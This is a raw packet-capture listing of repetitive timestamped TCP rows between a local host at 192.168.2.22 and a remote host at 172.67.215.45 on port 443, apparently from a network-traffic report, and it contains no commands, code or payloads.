Feb 13, 2024 15:08:06.422902107 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.422909975 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.422940016 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.422971010 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.424678087 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.424705982 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.424731970 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.424741030 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.424752951 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.424760103 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.425656080 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.425694942 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.425709963 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.425717115 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.425740004 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.425817013 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.427448034 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.427476883 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.427500963 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.427510023 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.427520037 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.427572012 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.429291964 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.429317951 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.429358006 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.429368019 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.429375887 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.430538893 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.430563927 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.430592060 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.430602074 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.430613995 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.431493044 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.431519032 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.431545973 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.431561947 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.431572914 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.431593895 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.433279991 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.433314085 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.433324099 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.433336973 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.433353901 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.433444023 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.435065985 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.435101986 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.435129881 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.435143948 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.435156107 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.436105967 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.436141014 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.436167002 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.436173916 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.436186075 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.437912941 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.437942028 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.437984943 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.437992096 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.438076973 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.439296961 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.439332962 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.439367056 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.439373016 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.439385891 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.441086054 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.441114902 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.441145897 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.441152096 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.441164970 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.441988945 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.442020893 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.442053080 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.442059040 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.442070007 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.443861961 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.443892956 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.443928957 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.443937063 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.443948030 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.444684982 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.444817066 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.444839954 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.444868088 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.444875002 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.444885015 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.445839882 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.446619987 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.446643114 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.446687937 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.446695089 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.446706057 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.446743965 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.447906971 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.447942019 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.447966099 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.447981119 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.447982073 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.448046923 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.449760914 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.449786901 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.449820995 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.449826956 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.449837923 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.451611042 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.451638937 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.451685905 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.451693058 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.451704025 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.451742887 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.452516079 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.452538967 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.452575922 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.452584028 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.452594042 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.454402924 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.454428911 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.454463959 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.454471111 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.454483986 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.454612017 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.455324888 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.455346107 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.455374002 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.455380917 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.455391884 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.455564976 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.457350969 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.457371950 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.457407951 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.457413912 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.457425117 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.457479954 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.458496094 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.458517075 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.458553076 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.458559036 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.458570957 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.458659887 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.460122108 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.460141897 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.460170984 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.460179090 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.460189104 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.460203886 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.460978985 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.461000919 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.461039066 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.461045980 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.461061001 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.461167097 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.462784052 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.462806940 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.462842941 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.462852001 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.462862968 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.464478016 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.464504004 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.464535952 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.464544058 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.464555025 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.465877056 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.465903044 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.465929985 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.465938091 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.465949059 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.466806889 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.466834068 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.466854095 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.466861963 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.466881990 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.468592882 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.468878031 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.468899012 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.468943119 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.468950987 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.469137907 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.469712019 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.469742060 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.469759941 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.469767094 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.469779015 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.469789028 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.470712900 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.470733881 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.470813036 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.470822096 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.470850945 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.472152948 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.472177982 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.472212076 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.472218990 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.472229958 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.473860979 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.473882914 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.473927021 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.473936081 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.473948002 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.474802971 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.474828959 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.474881887 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.474889994 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.474900961 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.475770950 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.475790024 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.475821972 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.475830078 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.475858927 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.476126909 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.476761103 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.477613926 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.477638960 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.477674961 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.477680922 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.477691889 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.477752924 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.478698969 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.478720903 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.478769064 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.478777885 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.478789091 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.479789972 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.479815006 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.479846001 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.479854107 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.479866982 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.479949951 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.480746984 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.480767965 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.480801105 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.480808020 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.480818033 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.480838060 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.482438087 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.482450962 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.482491016 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.482496977 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.482507944 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.483439922 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.483460903 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.483504057 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.483510971 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.483522892 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.483522892 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.484512091 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.484534025 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.484554052 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.484560966 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.484572887 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.484591961 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.485379934 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.485399008 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.485435963 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.485443115 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.485460043 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.487083912 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.487107038 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.487133026 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.487142086 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.487173080 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.488145113 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.488168955 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.488198996 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.488205910 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.488217115 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.488235950 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.489190102 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.489212036 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.489238977 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.489245892 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.489264011 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.490115881 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.490147114 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.490173101 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.490183115 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.490191936 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.491069078 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.491091013 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.491167068 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.491173029 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.491184950 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.492538929 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.492557049 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.492595911 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.492604017 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.492613077 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.493715048 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.493741035 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.493769884 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.493776083 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.493793964 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.493803024 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.494493961 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.494514942 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.494537115 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.494544983 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.494570017 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.494570017 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.495390892 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.495419025 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.495477915 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.495477915 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.495487928 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.496390104 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.496412039 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.496449947 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.496457100 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.496467113 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.498009920 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.498042107 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.498096943 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.498106003 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.498117924 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.498799086 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.498821974 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.498857021 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.498863935 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.498873949 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.499572039 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.499597073 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.499628067 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.499634981 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.499646902 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.499672890 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.500557899 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.500579119 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.500612020 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.500618935 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.500633001 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.501492977 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.501518011 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.501544952 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.501550913 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.501569986 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.501584053 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.503226042 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.503251076 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.503282070 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.503288984 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.503298998 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.504173994 CET	443	49169	172.67.215.45	192.168.2.22
